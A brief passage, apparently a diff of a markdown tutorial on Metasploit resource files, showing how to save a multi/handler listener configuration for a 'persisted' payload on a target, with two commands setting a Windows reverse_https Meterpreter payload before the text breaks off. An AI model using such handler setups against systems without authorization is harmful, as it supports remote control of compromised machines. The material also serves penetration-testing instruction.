r00t-3xp10it/hacking-material-books/metasploit-RC[ERB]/metasploit_resource_files.md

 <blockquote>In the next example we are going to write one handler resource file, because there are times when we 'persiste' our payload in target system and a few days later we dont remmenber the handler configurations set that day, thats one<br />of the reasons rc scripting can be usefull, besides automating the framework (erb scripting can access metasploit api).</blockquote>

-Open your text editor and copy/past the follow two metasploit core commands to it, save file and name it as: **handler.rc**
+Open your text editor and copy/past the follow metasploit commands to it, save file and name it as: **handler.rc**
 ```
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_https